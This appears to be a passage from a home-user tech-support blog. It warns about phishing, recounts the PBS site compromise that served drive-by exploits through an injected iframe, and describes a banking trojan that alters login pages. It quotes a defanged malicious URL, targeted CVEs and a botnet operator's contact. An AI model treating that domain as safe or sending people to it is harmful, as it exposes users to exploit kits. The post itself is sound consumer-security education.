3) If you receive an email from “a friend or relative or your bank or the IRS or anyone at all” asking you to click on a link or enter any private information, before doing it, check with them and ask if they sent it and confirm why they are asking. Those few minutes lost verifying if this is legit will say you a ton of head-aches and save you from paying me a ton of money (Not that I don’t want you to pay me a ton of money but I’m here to help you so this is your warning – No matter how much you really really want to don’t do it, or at least verify that your bank account has enough money to pay me when i have to go out and clean up your mess).

Tech: PBS Website compromised for a time and used to infect pc’s

Over the past few weeks I’ve seen a rise in calls from clients that got malware infections on their pc’s. They all ask the same thing, “how did I get infected, when I know better and don’t open attachments, and follow all those things everyone says your supposed to do to be safe”. I’ve had to explain that the latest way that the bad guys are using to get to your machine involves them using exploits to infect websites that people visit every day and use the legitimate website to infect your pc.

If what is occurring still doesn’t make sense to you, think of it this way –

No matter where you live, everyone has seen a news story about someone who shows up to a home dressed like the water company or cable company employee telling you that they need to access you house to check something or access your back yard to fix something and then once you let them in they do something like rob you (and hopefully that’s all they do). Well what is occurring in the computer world is the same thing.

The Pure wire blog (http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits (http://blog NULL.purewire NULL.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits)) has a story about PBS that occurred last week (and PBS has since fixed this) but this just shows how you could still get infected even with taking all the “best practices” precaution.

From the story:

On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

A forensic analysis of this attack revealed that the user requested the following:

hxxp://www.pbs.org/parents/curiousgeorge

which in turn requested:

hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

instead of:

hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.

PBS Login Prompt

If correct credentials are not provided, dipsy.bps.org serves an error page that looks normal:

… until you look under the hood. The end of the error page’s source:

contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

hxxp://qxfcuc.info/f.cgi?jzo

The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=2008-2992), CVE-2009-0927 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2009-0927), and CVE-2007-5659 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2007-5659)), AOL Radio AmpX (CVE-2007-6250 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2007-6250)), AOL SuperBuddy (CVE-2006-5820 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2006-5820)) and Apple QuickTime (CVE-2007-0015 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2007-0015)).

The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to "Send a message to ICQ #559156803; stats available under ststst02."

Alert: How malware / viruses can ruin your day

From the Panda Labs Blog ( http://pandalabs.pandasecurity.com/ (http://pandalabs NULL.pandasecurity NULL.com/) ), shows how malware and viruses can make small changing to your online banking screens and fool you into giving up information that can then be used to make unauthorized charges or clean you bank account out. (Click on the link below “Live Demo” or look on the sidebar under VodPod Videos)

Live Demo: Banking Trojan (http://vimeo NULL.com/6491332) from Panda Security (http://vimeo NULL.com/pandasecurity) on Vimeo (http://vimeo NULL.com).

I had a client a couple of days ago who asked me to clean her pc of viruses, during the conversation, she mentioned to me that on top of having to deal with the virus on the PC that she was dealing with her bank because someone got her info and drained her bank account in one evening. She mentioned that she didn’t know how they did it because she knew she followed all the rules people know for keeping her information private……

- She would shred old documents

- Had a very difficult sign on passwords

- Only thing she did online was banking at her bank, she would never buy anything online because she was afraid that somehow her info would be compromised (which it was anyways).

I unfortunately had to explain to her that the virus I was cleaning from her PC was the reason she had her information compromised and her bank account drained. The panda labs demo in this post shows how normally going to a banking site (they use Bank of America in the example, however, I should point out that B of A was not the bank my client was using) you get prompted for your Online ID and Online password for your bank. However, as shown once the machine is infected, the entire site looks normal to an untrained eye except for the fact that your sign on suddenly wants you to enter your pin #. Considering your at your banks website by all appearances most people would not think twice in entering that information. However, in fact, as shown in the video the information is on the sign in is actually being sent to criminals who can then use it to steal from you without ever meeting you in person.

Just another example as to why you need a good anti-virus, a good anti-malware (and yes these are 2 different functions) on your machine and that both programs need to be updated regularly and run regularly on your machine to try and keep your PC secure. Also if you do get infected, you should either directly address the issue and make sure to clean your machine if you know what your doing, or make sure that a trained professional cleans your machine before doing any sensitive work on your pc.

Tech Geek and More

Technology Explained for All

Category Archives: Spyware